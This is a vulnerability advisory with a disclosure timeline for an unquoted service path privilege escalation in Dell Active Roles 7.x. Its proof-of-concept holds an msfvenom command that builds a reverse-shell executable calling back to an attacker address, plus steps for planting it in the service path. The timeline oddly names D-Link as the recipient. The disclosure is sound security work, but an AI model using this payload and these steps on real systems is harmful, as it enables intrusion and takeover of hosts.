# Exploit Title: [Dell Active Roles Unquoted Service Path Privilege Escalation] # Date: [16/06/2017] # Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot # Vendor Homepage: [https://www.oneidentity.com/products/active-roles/] # Version: [Dell Active Roles versions 7.1, 7.0.4, 7.0.3, 7.0.2, and 7.0 ] # Tested on: [Dell ActiveRoles version 7.1.2.3406] # CVE : [GENERIC-MAP-NO-MATCH] ================== #Product:- ================== Dell Active Roles (now Quest Active Roles) Server gives Active Directory administrators all the tools necessary to securely and efficiently manage Active Directory, overcoming the native shortcomings of AD and automates the most common AD administration tasks. ================== #Vulnerability:- ================== Dell Active Roles Unquoted Service Path Privilege Escalation ======================== #Vulnerability Details:- ======================== ============================================================================================================================= Dell Active Roles Unquoted Service Path Privilege Escalation ============================================================================================================================= Dell Active Roles installs two services on the system, 'Active Roles Administration Service' and 'Active Roles Synchronization Service'. Both the services use a search path that contains an unquoted element, in which the element contains white space or other separators. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. #Proof-of-Concept:- ------------------- 1. Create an executable file using MSFVenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.100.6 LPORT=443 -f exe > Active.exe 2. Log into the target with a low privileged account which has write access to the file system ( or has misconfigured ACL). 3. Copy this file to 'C:\Program Files\Dell\' on the target machine. 4. Wait for System reboot or admin to restart Active Roles Synchronization Service. 5. The target machine sends reverse shell after the reboot or when service is restarted. A successful attempt would require the local attacker must insert an executable file in the path of the service.It could be C:\Program.exe or C:\Program Files\Dell\Active.exe\ for that matter. Upon service restart or system reboot, the malicious code will be run with elevated privileges. =================================== #Vulnerability Disclosure Timeline: =================================== 16/06/2017: First email to disclose vulnerability to D-Link incident response team. 19/06/2017: Vendor acknowledged the report. 1/09/2017: Vendor published a KB article for workaround: https://support.oneidentity.com/kb/232543 30/10/2017: Vendor released a fix version 7.2: https://support.oneidentity.com/active-roles/7.2/download-new-releases